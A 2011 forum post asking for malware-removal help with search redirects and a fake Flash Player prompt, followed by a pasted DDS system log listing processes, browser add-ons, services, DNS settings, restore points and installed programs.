Welcome to MalwareRemoval.com,
What if we told you that you could get malware removal help from experts, and that it was 100% free? MalwareRemoval.com provides free support for people with infected computers. Our help and the tools we use are always 100% free. No hidden catch. We simply enjoy helping others. You enjoy a clean, safe computer.


redirected searches and email problems

Post by ard » June 9th, 2011, 9:59 am

My searches are almost always redirected to unrelated sites. The problem began on 6-2-2011, I think. I got a screen about Microsoft XP recovery software, which I did not run. When viewing email using Explorer I get a message requesting the loading of Flash Player 9.0; it looks like this:


flash required for this application

Your browser must have Flash 9.0 or higher installed to add this
application. You can download and install the latest Flash Player
here

OK

Thanks, Al

DDS.TXT --------------------------------------------------------------------------------------------
.
DDS (Ver_2011-06-03.01) - NTFSx86
Internet Explorer: 8.0.6001.18702
Run by admin at 15:51:03 on 2011-06-08
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.510.175 [GMT -4:00]
.
AV: AntiVir Desktop *Enabled/Updated* {AD166499-45F9-482A-A743-FDD3350758C7}
AV: Sunbelt VIPRE *Disabled/Outdated* {964FCE60-0B18-4D30-ADD6-EB178909041C}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\system32\svchost.exe -k WudfServiceGroup
C:\WINDOWS\system32\svchost.exe -k netsvcs
svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Avira\AntiVir Desktop\sched.exe
C:\Program Files\Avira\AntiVir Desktop\avguard.exe
C:\Program Files\Avira\AntiVir Desktop\avshadow.exe
svchost.exe
C:\WINDOWS\system32\svchost.exe -k imgsvc
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\taskmgr.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\internet explorer\iexplore.exe
C:\Program Files\internet explorer\iexplore.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.google.com/
uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
uInternet Connection Wizard,ShellNext = iexplore
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
BHO: RealPlayer Download and Record Plugin for Internet Explorer: {3049c3e9-b461-4bc5-8870-4c09146192ca} - c:\documents and settings\all users\application data\real\realplayer\browserrecordplugin\ie\rpbrowserrecordplugin.dll
BHO: Spybot-S&D IE Protection: {53707962-6f74-2d53-2644-206d7942484f} - c:\program files\spybot - search & destroy\SDHelper.dll
BHO: Skype add-on for Internet Explorer: {ae805869-2e5c-4ed4-8f7b-f1f7851a4497} - c:\program files\skype\toolbars\internet explorer\skypeieplugin.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\java\jre6\bin\jp2ssv.dll
TB: {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
TB: {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - No File
TB: Google Toolbar: {2318c2b1-4965-11d4-9b18-009027a5cd4f} - c:\program files\google\google toolbar\GoogleToolbar_32.dll
TB: {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
TB: MyAshampoo Toolbar: {a1e75a0e-4397-4ba8-bb50-e19fb66890f4} - c:\program files\myashampoo\tbMyA1.dll
TB: {472734EA-242A-422B-ADF8-83D1E48CC825} - No File
uRun: [ctfmon.exe] c:\windows\system32\ctfmon.exe
mRun: [MSConfig] c:\windows\pchealth\helpctr\binaries\MSCONFIG.EXE /auto
mPolicies-explorer: NoResolveTrack = 0 (0x0)
mPolicies-explorer: NoFileAssociate = 0 (0x0)
mPolicies-system: HideShutdownScripts = 0 (0x0)
mPolicies-system: NoDispSettingsPage = 0 (0x0)
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - c:\program files\skype\toolbars\internet explorer\skypeieplugin.dll
IE: {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - {53707962-6F74-2D53-2644-206D7942484F} - c:\program files\spybot - search & destroy\SDHelper.dll
Trusted Zone: magicjack.com\my
Trusted Zone: talk4free.com\reg
DPF: {B1E2B96C-12FE-45E2-BEF1-44A219113CDD} - hxxp://www.superadblocker.com/activex/sabspx.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinsta ... s-i586.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
TCP: DhcpNameServer = 192.168.0.1
TCP: Interfaces\{F1AACA3A-E5BE-452E-9F2E-0E4D30CBE236} : NameServer = 67.90.152.122,67.107.71.186
TCP: Interfaces\{F1AACA3A-E5BE-452E-9F2E-0E4D30CBE236} : DhcpNameServer = 192.168.0.1
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - c:\program files\skype\toolbars\internet explorer\skypeieplugin.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\progra~1\common~1\skype\SKYPE4~1.DLL
Notify: !SASWinLogon - c:\program files\superantispyware\SASWINLO.DLL
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\WPDShServiceObj.dll
SEH: SABShellExecuteHook Class: {5ae067d3-9afb-48e0-853a-ebb7f4a000da} - c:\program files\superantispyware\SASSEH.DLL
.
============= SERVICES / DRIVERS ===============
.
R1 avgio;avgio;c:\program files\avira\antivir desktop\avgio.sys [2009-9-15 11608]
R1 SASDIFSV;SASDIFSV;c:\program files\superantispyware\sasdifsv.sys [2010-2-17 12872]
R1 SASKUTIL;SASKUTIL;c:\program files\superantispyware\SASKUTIL.SYS [2010-5-10 67656]
R1 sbaphd;sbaphd;c:\windows\system32\drivers\sbaphd.sys [2011-3-22 21464]
R1 SBRE;SBRE;c:\windows\system32\drivers\SBREDrv.sys [2010-5-13 98392]
R1 SbTis;SbTis;c:\windows\system32\drivers\sbtis.sys [2011-3-22 212568]
R2 AntiVirSchedulerService;Avira AntiVir Scheduler;c:\program files\avira\antivir desktop\sched.exe [2009-9-15 135336]
R2 AntiVirService;Avira AntiVir Guard;c:\program files\avira\antivir desktop\avguard.exe [2009-9-15 269480]
R2 avgntflt;avgntflt;c:\windows\system32\drivers\avgntflt.sys [2009-9-15 61960]
R2 sbapifs;sbapifs;c:\windows\system32\drivers\sbapifs.sys [2011-3-22 69976]
R3 CAM1690;USB PC Camera;c:\windows\system32\drivers\cam1690.sys [2007-9-20 181888]
R3 PbsAuDrv;PolderbitS Audio Driver;c:\windows\system32\drivers\pbsaudrv.sys [2009-8-1 110752]
R3 RRNetCapMP;RRNetCapMP;c:\windows\system32\drivers\rrnetcap.sys [2010-1-6 27168]
S2 MBAMService;MBAMService;c:\program files\malwarebytes' anti-malware\mbamservice.exe [2009-9-4 366640]
S3 ADM8511;ADMtek ADM8511/AN986 USB To Fast Ethernet Converter;c:\windows\system32\drivers\ADM8511.SYS [2005-7-26 20160]
S3 cpuz130;cpuz130;\??\c:\docume~1\admin\locals~1\temp\cpuz130\cpuz_x32.sys --> c:\docume~1\admin\locals~1\temp\cpuz130\cpuz_x32.sys [?]
S3 ionwpvvc;Watchport/V2 USB Camera;c:\windows\system32\drivers\ionwpvvc.sys [2008-2-20 38656]
S3 MBAMProtector;MBAMProtector;\??\c:\windows\system32\drivers\mbam.sys --> c:\windows\system32\drivers\mbam.sys [?]
S3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\mbamswissarmy.sys [2009-9-4 39984]
S3 nosGetPlusHelper;getPlus(R) Helper 3004;c:\windows\system32\svchost.exe -k nosGetPlusHelper [2009-8-15 14336]
S3 RRNetCap;RRNetCap Service;c:\windows\system32\drivers\rrnetcap.sys [2010-1-6 27168]
S4 Compass Server;Compass Server; [x]
S4 DfSdkS;Defragmentation-Service;c:\program files\ashampoo\ashampoo winoptimizer 7\DfSdkS.exe [2011-4-13 406016]
S4 gupdate;Google Update Service (gupdate);c:\program files\google\update\GoogleUpdate.exe [2010-10-19 136176]
S4 gupdatem;Google Update Service (gupdatem);c:\program files\google\update\GoogleUpdate.exe [2010-10-19 136176]
S4 magicJack;magicJack;c:\mjusbsp\srvany.exe [2011-2-27 8192]
S4 nlsX86cc;NLS Service;c:\windows\system32\nlssrv32.exe --> c:\windows\system32\NLSSRV32.EXE [?]
S4 SBAMSvc;VIPRE Antivirus;c:\program files\sunbelt software\vipre\SBAMSvc.exe [2010-8-20 2763080]
S4 SBPIMSvc;SB Recovery Service;c:\program files\sunbelt software\vipre\SBPIMSvc.exe [2010-8-20 181584]
.
=============== Created Last 30 ================
.
2011-06-07 11:47:57 -------- d-----w- c:\documents and settings\admin\application data\AVG10
2011-06-07 11:36:56 -------- d--h--w- c:\documents and settings\all users\application data\Common Files
2011-06-07 11:32:39 -------- d-----w- c:\windows\system32\drivers\AVG
2011-06-07 11:32:39 -------- d-----w- c:\documents and settings\all users\application data\AVG10
2011-06-07 11:31:21 -------- d-----w- c:\program files\AVG
2011-06-07 11:24:58 -------- d-----w- c:\documents and settings\all users\application data\MFAData
2011-06-06 17:09:06 -------- d-----w- c:\program files\AVAST Software
2011-06-06 17:09:06 -------- d-----w- c:\documents and settings\all users\application data\AVAST Software
2011-06-06 16:57:10 -------- d-----w- c:\program files\SpywareBlaster
2011-06-05 13:16:05 -------- d-----w- c:\documents and settings\all users\application data\SUPERAntiSpyware.com
2011-06-05 13:16:05 -------- d-----w- c:\documents and settings\admin\application data\SUPERAntiSpyware.com
2011-06-05 13:15:07 -------- d-----w- c:\program files\SUPERAntiSpyware
2011-06-05 07:45:48 -------- d-----w- c:\program files\Spybot - Search & Destroy
2011-06-04 20:00:33 -------- d-----w- c:\documents and settings\admin\local settings\application data\Threat Expert
2011-06-04 16:32:48 -------- d-----w- c:\program files\Watchtower
2011-06-04 15:19:59 -------- d-----w- c:\windows\system32\wbem\repository\FS
2011-06-04 15:19:59 -------- d-----w- c:\windows\system32\wbem\Repository
2011-06-04 14:15:34 -------- d-----w- C:\- PDF docs
2011-06-04 14:15:20 -------- d-----w- C:\- maps
2011-06-04 13:55:41 -------- d-----w- C:\- JW info
2011-06-04 13:55:39 -------- d-----w- C:\- money
2011-06-04 13:55:39 -------- d-----w- C:\- bank
2011-06-04 13:55:38 -------- d-----w- C:\- XL docs
2011-06-04 13:55:34 -------- d-----w- C:\- word docs
2011-06-04 13:54:03 -------- d-----w- C:\- sounds
2011-06-04 13:53:51 -------- d-----w- C:\- powerpoint
2011-06-04 00:37:44 331805736 ----a-w- c:\temp\windowsxp-kb936929-sp3-x86-enu_c81472f7eeea2eca421e116cd4c03e2300ebfde4.exe
2011-06-04 00:30:49 4608744 ----a-w- c:\temp\WindowsXP_KB310994_SP2_Pro_BootDisk_ENU.exe
2011-05-16 13:45:30 7040 ----a-w- c:\windows\system32\sabprocenum.sys
.
==================== Find3M ====================
.
2011-06-04 16:09:13 107 ----a-w- c:\documents and settings\admin\application data\netstat.bat
2011-05-29 13:11:30 39984 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
.
============= FINISH: 15:52:15.32 ===============


-----------------------------------------------------------------------------------------------------
.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2011-06-03.01)
.
Microsoft Windows XP Home Edition
Boot Device: \Device\HarddiskVolume2
Install Date: 7/26/2005 6:25:11 PM
System Uptime: 6/8/2011 2:48:57 PM (1 hours ago)
.
Motherboard: Dell Inc. | | 0X8582
Processor: Intel(R) Pentium(R) 4 CPU 3.00GHz | Microprocessor | 2992/800mhz
.
==== Disk Partitions =========================
.
A: is Removable
C: is FIXED (NTFS) - 145 GiB total, 48.738 GiB free.
D: is CDROM ()
E: is CDROM ()
F: is Removable
G: is Removable
H: is Removable
I: is Removable
.
==== Disabled Device Manager Items =============
.
==== System Restore Points ===================
.
RP161: 9/17/2010 3:29:20 PM - Installed DeLorme Phone Data 2011.
RP162: 9/25/2010 11:14:46 AM - Installed Microsoft Fix it 50027
RP163: 9/27/2010 1:55:48 PM - Removed DeLorme Phone Data 2011.
RP164: 9/27/2010 1:58:49 PM - Removed DeLorme Street Atlas USA 2011 Plus.
RP165: 9/28/2010 2:37:58 PM - Configured Microsoft Office Standard 2007
RP166: 10/16/2010 2:38:49 PM - Software Distribution Service 3.0
RP167: 10/18/2010 1:44:08 PM - Installed DeLorme Street Atlas USA 2011 Plus.
RP168: 10/18/2010 1:55:15 PM - Installed DeLorme Phone Data 2011.
RP169: 10/25/2010 10:11:25 AM - Installed Microsoft Office PowerPoint Viewer 2007 (English)
RP170: 11/5/2010 10:53:42 AM - Software Distribution Service 3.0
RP171: 11/12/2010 1:14:47 PM - Software Distribution Service 3.0
RP172: 11/18/2010 11:46:13 AM - Software Distribution Service 3.0
RP173: 11/29/2010 4:14:39 PM - Installed Nitro PDF Professional
RP174: 11/30/2010 10:54:33 AM - Removed Nitro PDF Professional
RP175: 12/14/2010 10:18:01 AM - Removed Acrobat.com
RP176: 12/25/2010 9:35:58 AM - Software Distribution Service 3.0
RP177: 1/12/2011 2:16:14 PM - Software Distribution Service 3.0
RP178: 1/15/2011 11:13:57 AM - Installed VueMinder Calendar Lite
RP179: 2/27/2011 4:53:30 PM - Software Distribution Service 3.0
RP180: 2/27/2011 5:08:37 PM - Removed VueMinder Calendar Lite
RP181: 2/27/2011 5:12:07 PM - Removed Microsoft Office Converter Pack
RP182: 2/27/2011 5:12:48 PM - Removed Microsoft Office Excel Viewer 2003
RP183: 2/27/2011 5:20:14 PM - Configured Microsoft Office Standard 2007
RP184: 2/27/2011 5:24:41 PM - Configured Microsoft Office Standard 2007
RP185: 2/27/2011 6:04:06 PM - Installed The Ultimate Library by ReaderRom
RP186: 2/27/2011 6:13:48 PM - Removed The Ultimate Library by ReaderRom
RP187: 2/27/2011 6:21:49 PM - Installed The Ultimate Library by ReaderRom
RP188: 2/27/2011 6:26:24 PM - Removed The Ultimate Library by ReaderRom
RP189: 2/28/2011 4:43:18 PM - Software Distribution Service 3.0
RP190: 3/4/2011 4:30:49 PM - Installed Windows Resource Kit Tools
RP191: 3/9/2011 8:14:28 PM - Software Distribution Service 3.0
RP192: 3/17/2011 4:41:35 PM - Removed Adobe Reader 9.4.2.
RP193: 3/17/2011 4:42:06 PM - Installed Adobe Reader X (10.0.1).
RP194: 3/19/2011 11:46:56 AM - Removed Ask Toolbar.
RP195: 3/19/2011 11:50:04 AM - Removed MAZE
RP196: 3/19/2011 11:55:28 AM - Removed PixiePack Codec Pack
RP197: 3/19/2011 11:56:31 AM - Removed Bing Maps 3D
RP198: 3/22/2011 7:57:35 AM - Installed VIPRE Antivirus.
RP199: 3/25/2011 7:53:27 AM - Software Distribution Service 3.0
RP200: 4/13/2011 11:48:48 AM - Removed Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
RP201: 4/13/2011 11:50:33 AM - Removed Microsoft Visual C++ 2005 Redistributable
RP202: 4/13/2011 11:52:35 AM - Removed Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
RP203: 4/13/2011 11:53:55 AM - Removed Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148
RP204: 4/13/2011 11:55:09 AM - Removed Microsoft Visual C++ 2005 Redistributable
RP205: 4/14/2011 10:35:03 AM - Removed e-Sword
RP206: 4/14/2011 10:35:18 AM - Installed e-Sword
RP207: 4/14/2011 10:50:12 AM - Removed e-Sword
RP208: 4/14/2011 10:55:14 AM - Installed e-Sword
RP209: 4/14/2011 3:40:37 PM - Installed Microsoft Visual C++ 2005 Redistributable
RP210: 4/17/2011 6:13:20 PM - Software Distribution Service 3.0
RP211: 4/30/2011 1:00:14 PM - Software Distribution Service 3.0
RP212: 6/2/2011 11:58:58 AM - Software Distribution Service 3.0
RP213: 6/3/2011 7:52:56 PM - Software Distribution Service 3.0
RP214: 6/3/2011 8:56:00 PM - Software Distribution Service 3.0
RP215: 6/4/2011 11:14:43 AM - Restore Operation
RP216: 6/5/2011 2:58:59 AM - Software Distribution Service 3.0
RP217: 6/6/2011 1:09:06 PM - avast! Free Antivirus Setup
RP218: 6/7/2011 7:31:19 AM - Installed AVG 2011
RP219: 6/7/2011 7:32:14 AM - Installed AVG 2011
RP220: 6/8/2011 9:55:13 AM - Removed AVG 2011
RP221: 6/8/2011 9:58:38 AM - Removed AVG 2011
RP222: 6/8/2011 10:17:41 AM - avast! Free Antivirus Setup
RP223: 6/8/2011 11:07:18 AM - Removed Adobe Reader X (10.0.1).
.
==== Installed Programs ======================
.
Sansa Media Converter
3ivx D4 4.5.1 Decoder (remove only)
50 Games Collection
Adobe AIR
Amazon Kindle For PC v1.1
Apple Application Support
Apple Mobile Device Support
Apple Software Update
Ashampoo WinOptimizer 7 v.7.26
ATI Control Panel
ATI Display Driver
Audacity 1.2.6
Avira AntiVir Personal - Free Antivirus
AviSynth 2.5
AVS Audio Converter version 6.1
AVS Audio Editor version 5.2
AVS Image Converter 1.2.1.100
AVS Photo Editor
AVS Update Manager 1.0
AVS Video Converter 6
AVS Video Editor 4 4.2.1.165
AVS Video Recorder 2.4 (Service Version)
AVS YouTube Uploader version 2.1
AVS4YOU Software Navigator 1.4
Bonjour
Brother HL-2140
ClocX (1.5b1)
Compatibility Pack for the 2007 Office system
CrossHair
Cucusoft YouTube Mate 8.05
CutePDF Writer 2.8
Dell Digital Jukebox Driver
Dell Driver Reset Tool
Dell Photo AIO Printer 962
Dell Support Center (Support Software)
Dell System Restore
DellSupport
DeLorme Phone Data 2011
DeLorme Street Atlas USA 2011 Plus
Direct MIDI to MP3 Converter version 6.0.0.27
DNA
dvdSanta 4.50
DVDStyler v1.7.1
e-Sword
Encyclopædia Britannica Profiles : World Religions CD-ROM
ERUNT 1.1j
ESET Online Scanner v3
Free Natural Text to Speech Reader 2008
Futuremark SystemInfo
getPlus(R) for Adobe
Google Chrome
Google Earth Plug-in
Google Toolbar for Internet Explorer
Google Update Helper
Google Video Player
High Definition Audio Driver Package - KB835221
HijackThis 2.0.2
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB953595)
Hotfix for Microsoft .NET Framework 3.5 SP1 (KB958484)
Hotfix for Windows Media Format 11 SDK (KB929399)
Hotfix for Windows Media Player 11 (KB939683)
Hotfix for Windows XP (KB2158563)
Hotfix for Windows XP (KB2443685)
Hotfix for Windows XP (KB952287)
Hotfix for Windows XP (KB954550-v5)
Hotfix for Windows XP (KB961118)
Hotfix for Windows XP (KB970653-v3)
Hotfix for Windows XP (KB976098-v2)
Hotfix for Windows XP (KB979306)
Hotfix for Windows XP (KB981793)
Inside Out Networks Watchport/V Drivers (Remove only)
Intel Matrix Storage Manager
Intel(R) PRO Network Connections Software v9.2.4.11
Intel(R) PROSafe for Wired Connections
Internet Explorer Default Page
ISA 2 basic
ISA 2.0 - YLT module 1.2.1
ISA_CLV_module 1.2.0
iTunes
Java Auto Updater
Java(TM) 6 Update 20
LADSPA_plugins-win-0.4.15
Macromedia Flash Player
magicJack
magicJack Recovery Tool 1.0
Malwarebytes' Anti-Malware version 1.51.0.1200
Managed DirectX (0900)
MapSphere
Microsoft .NET Framework 1.1
Microsoft .NET Framework 1.1 Security Update (KB2416447)
Microsoft .NET Framework 1.1 Security Update (KB979906)
Microsoft .NET Framework 2.0 Service Pack 2
Microsoft .NET Framework 3.0 Service Pack 2
Microsoft .NET Framework 3.5 SP1
Microsoft Automated Troubleshooting Services Shim
Microsoft Compression Client Pack 1.0 for Windows XP
Microsoft Internationalized Domain Names Mitigation APIs
Microsoft Kernel-Mode Driver Framework Feature Pack 1.5
Microsoft Kernel-Mode Driver Framework Feature Pack 1.7
Microsoft National Language Support Downlevel APIs
Microsoft Office 2007 Service Pack 2 (SP2)
Microsoft Office Excel MUI (English) 2007
Microsoft Office Outlook MUI (English) 2007
Microsoft Office PowerPoint MUI (English) 2007
Microsoft Office PowerPoint Viewer 2007 (English)
Microsoft Office Proof (English) 2007
Microsoft Office Proof (French) 2007
Microsoft Office Proof (Spanish) 2007
Microsoft Office Proofing (English) 2007
Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2)
Microsoft Office Shared MUI (English) 2007
Microsoft Office Shared Setup Metadata MUI (English) 2007
Microsoft Office Standard 2007
Microsoft Office Word MUI (English) 2007
Microsoft Picture It! Express 2000
Microsoft Save as PDF Add-in for 2007 Microsoft Office programs
Microsoft Save as PDF or XPS Add-in for 2007 Microsoft Office programs
Microsoft Save as XPS Add-in for 2007 Microsoft Office programs
Microsoft Software Update for Web Folders (English) 12
Microsoft Text-to-Speech Engine 4.0 (English)
Microsoft User-Mode Driver Framework Feature Pack 1.0
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Works 2000
MID Converter 4.2
MSXML 4.0 SP2 (KB936181)
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
MSXML 6 Service Pack 2 (KB954459)
Multimedia Samples
MyAshampoo Toolbar
Naevius GVI Converter 1.3
Nero Suite
Online Bible 10.95
Pistonsoft MP3 Tags Editor
Pistonsoft Text to Speech Converter 1.11.0
PolderbitS Sound Recorder and Editor
PowerDVD 5.5
Print to Fax
PS-Utility
Qualxserve Service Agreement
QuickTime
QuickVerse 7.0
RealPlayer
RealUpgrade 1.0
Security Update for 2007 Microsoft Office System (KB2288621)
Security Update for 2007 Microsoft Office System (KB2288931)
Security Update for 2007 Microsoft Office System (KB2345043)
Security Update for 2007 Microsoft Office System (KB2466156)
Security Update for 2007 Microsoft Office System (KB2509488)
Security Update for 2007 Microsoft Office System (KB969559)
Security Update for CAPICOM (KB931906)
Security Update for Microsoft .NET Framework 3.5 SP1 (KB2416473)
Security Update for Microsoft Office Excel 2007 (KB2464583)
Security Update for Microsoft Office InfoPath 2007 (KB979441)
Security Update for Microsoft Office PowerPoint 2007 (KB2535818)
Security Update for Microsoft Office PowerPoint Viewer 2007 (KB2464623)
Security Update for Microsoft Office system 2007 (972581)
Security Update for Microsoft Office system 2007 (KB974234)
Security Update for Microsoft Office Visio Viewer 2007 (KB973709)
Security Update for Microsoft Office Word 2007 (KB2344993)
Security Update for Step By Step Interactive Training (KB898458)
Security Update for Step By Step Interactive Training (KB923723)
Security Update for Windows Internet Explorer 7 (KB938127-v2)
Security Update for Windows Internet Explorer 7 (KB938127)
Security Update for Windows Internet Explorer 7 (KB956390)
Security Update for Windows Internet Explorer 7 (KB961260)
Security Update for Windows Internet Explorer 7 (KB972260)
Security Update for Windows Internet Explorer 8 (KB2183461)
Security Update for Windows Internet Explorer 8 (KB2360131)
Security Update for Windows Internet Explorer 8 (KB2416400)
Security Update for Windows Internet Explorer 8 (KB2482017)
Security Update for Windows Internet Explorer 8 (KB2497640)
Security Update for Windows Internet Explorer 8 (KB2510531)
Security Update for Windows Internet Explorer 8 (KB969897)
Security Update for Windows Internet Explorer 8 (KB971961)
Security Update for Windows Internet Explorer 8 (KB972260)
Security Update for Windows Internet Explorer 8 (KB974455)
Security Update for Windows Internet Explorer 8 (KB976325)
Security Update for Windows Internet Explorer 8 (KB978207)
Security Update for Windows Internet Explorer 8 (KB981332)
Security Update for Windows Media Player (KB2378111)
Security Update for Windows Media Player (KB911564)
Security Update for Windows Media Player (KB952069)
Security Update for Windows Media Player (KB954155)
Security Update for Windows Media Player (KB968816)
Security Update for Windows Media Player (KB973540)
Security Update for Windows Media Player (KB975558)
Security Update for Windows Media Player (KB978695)
Security Update for Windows Media Player 10 (KB911565)
Security Update for Windows Media Player 10 (KB917734)
Security Update for Windows Media Player 10 (KB936782)
Security Update for Windows Media Player 11 (KB936782)
Security Update for Windows Media Player 11 (KB954154)
Security Update for Windows Media Player 6.4 (KB925398)
Security Update for Windows XP (KB2079403)
Security Update for Windows XP (KB2121546)
Security Update for Windows XP (KB2160329)
Security Update for Windows XP (KB2229593)
Security Update for Windows XP (KB2259922)
Security Update for Windows XP (KB2279986)
Security Update for Windows XP (KB2286198)
Security Update for Windows XP (KB2296011)
Security Update for Windows XP (KB2296199)
Security Update for Windows XP (KB2347290)
Security Update for Windows XP (KB2360937)
Security Update for Windows XP (KB2387149)
Security Update for Windows XP (KB2393802)
Security Update for Windows XP (KB2412687)
Security Update for Windows XP (KB2419632)
Security Update for Windows XP (KB2423089)
Security Update for Windows XP (KB2436673)
Security Update for Windows XP (KB2440591)
Security Update for Windows XP (KB2443105)
Security Update for Windows XP (KB2476687)
Security Update for Windows XP (KB2478960)
Security Update for Windows XP (KB2478971)
Security Update for Windows XP (KB2479628)
Security Update for Windows XP (KB2479943)
Security Update for Windows XP (KB2481109)
Security Update for Windows XP (KB2483185)
Security Update for Windows XP (KB2485376)
Security Update for Windows XP (KB2485663)
Security Update for Windows XP (KB2503658)
Security Update for Windows XP (KB2506212)
Security Update for Windows XP (KB2506223)
Security Update for Windows XP (KB2507618)
Security Update for Windows XP (KB2508272)
Security Update for Windows XP (KB2508429)
Security Update for Windows XP (KB2509553)
Security Update for Windows XP (KB2511455)
Security Update for Windows XP (KB2524375)
Security Update for Windows XP (KB923561)
Security Update for Windows XP (KB923689)
Security Update for Windows XP (KB938464-v2)
Security Update for Windows XP (KB938464)
Security Update for Windows XP (KB941569)
Security Update for Windows XP (KB946648)
Security Update for Windows XP (KB950760)
Security Update for Windows XP (KB950762)
Security Update for Windows XP (KB950974)
Security Update for Windows XP (KB951066)
Security Update for Windows XP (KB951376-v2)
Security Update for Windows XP (KB951698)
Security Update for Windows XP (KB951748)
Security Update for Windows XP (KB952004)
Security Update for Windows XP (KB952954)
Security Update for Windows XP (KB954211)
Security Update for Windows XP (KB954459)
Security Update for Windows XP (KB954600)
Security Update for Windows XP (KB955069)
Security Update for Windows XP (KB956572)
Security Update for Windows XP (KB956744)
Security Update for Windows XP (KB956802)
Security Update for Windows XP (KB956803)
Security Update for Windows XP (KB956841)
Security Update for Windows XP (KB956844)
Security Update for Windows XP (KB957097)
Security Update for Windows XP (KB958644)
Security Update for Windows XP (KB958687)
Security Update for Windows XP (KB958869)
Security Update for Windows XP (KB959426)
Security Update for Windows XP (KB960225)
Security Update for Windows XP (KB960715)
Security Update for Windows XP (KB960803)
Security Update for Windows XP (KB960859)
Security Update for Windows XP (KB961371-v2)
Security Update for Windows XP (KB961501)
Security Update for Windows XP (KB968537)
Security Update for Windows XP (KB969059)
Security Update for Windows XP (KB969947)
Security Update for Windows XP (KB970238)
Security Update for Windows XP (KB970430)
Security Update for Windows XP (KB971468)
Security Update for Windows XP (KB971486)
Security Update for Windows XP (KB971557)
Security Update for Windows XP (KB971633)
Security Update for Windows XP (KB971657)
Security Update for Windows XP (KB972270)
Security Update for Windows XP (KB973346)
Security Update for Windows XP (KB973354)
Security Update for Windows XP (KB973507)
Security Update for Windows XP (KB973525)
Security Update for Windows XP (KB973869)
Security Update for Windows XP (KB973904)
Security Update for Windows XP (KB974112)
Security Update for Windows XP (KB974318)
Security Update for Windows XP (KB974392)
Security Update for Windows XP (KB974571)
Security Update for Windows XP (KB975025)
Security Update for Windows XP (KB975467)
Security Update for Windows XP (KB975560)
Security Update for Windows XP (KB975561)
Security Update for Windows XP (KB975562)
Security Update for Windows XP (KB975713)
Security Update for Windows XP (KB977165-v2)
Security Update for Windows XP (KB977816)
Security Update for Windows XP (KB977914)
Security Update for Windows XP (KB978037)
Security Update for Windows XP (KB978251)
Security Update for Windows XP (KB978262)
Security Update for Windows XP (KB978338)
Security Update for Windows XP (KB978542)
Security Update for Windows XP (KB978601)
Security Update for Windows XP (KB978706)
Security Update for Windows XP (KB979309)
Security Update for Windows XP (KB979482)
Security Update for Windows XP (KB979683)
Security Update for Windows XP (KB979687)
Security Update for Windows XP (KB980195)
Security Update for Windows XP (KB980218)
Security Update for Windows XP (KB980232)
Security Update for Windows XP (KB980436)
Security Update for Windows XP (KB981322)
Security Update for Windows XP (KB981852)
Security Update for Windows XP (KB981957)
Security Update for Windows XP (KB981997)
Security Update for Windows XP (KB982132)
Security Update for Windows XP (KB982214)
Security Update for Windows XP (KB982665)
Security Update for Windows XP (KB982802)
Skype Toolbars
Skype™ 4.2
Spybot - Search & Destroy
SpywareBlaster 4.4
SUPERAntiSpyware
Switch Sound File Converter
SyncCell 3.0
TaxACT 2009
TaxACT 2009 Pennsylvania
TaxACT 2010
TaxACT 2010 Pennsylvania
TaxACT Pennsylvania 2006
TaxACT Pennsylvania 2007
TMS Explorer
TTS
Tunebite
TVPCElite
Update for 2007 Microsoft Office System (KB967642)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707)
Update for Microsoft Office Outlook 2007 (KB2509470)
Update for Outlook 2007 Junk Email Filter (KB2536413)
Update for Windows Internet Explorer 8 (KB972636)
Update for Windows Internet Explorer 8 (KB976662)
Update for Windows Internet Explorer 8 (KB976749)
Update for Windows Internet Explorer 8 (KB980182)
Update for Windows XP (KB2141007)
Update for Windows XP (KB2345886)
Update for Windows XP (KB2467659)
Update for Windows XP (KB951978)
Update for Windows XP (KB955759)
Update for Windows XP (KB955839)
Update for Windows XP (KB967715)
Update for Windows XP (KB968389)
Update for Windows XP (KB971029)
Update for Windows XP (KB971737)
Update for Windows XP (KB973687)
Update for Windows XP (KB973815)
USB Video Camera
VIPRE Antivirus
